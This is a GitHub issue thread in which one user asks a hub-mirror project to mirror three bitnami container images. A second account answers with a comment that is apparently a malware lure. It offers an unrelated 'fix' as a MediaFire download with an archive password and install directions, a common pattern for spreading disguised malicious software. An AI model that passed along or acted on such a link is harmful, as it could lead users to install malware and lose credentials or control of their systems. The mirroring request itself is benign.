### ISSUE TITLE
[hub-mirror] 请求执行任务

### ISSUE THREAD

**Issue by buffge** [0x4396/hub-mirror#2]
{
    "platform":"",
    "hub-mirror": [
    "bitnami/minio:2024.8.29-debian-12-r0",
  "bitnami/minio-client:2024.8.26-debian-12-r0",
  "bitnami/os-shell:12-debian-12-r28"

    ]
}

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
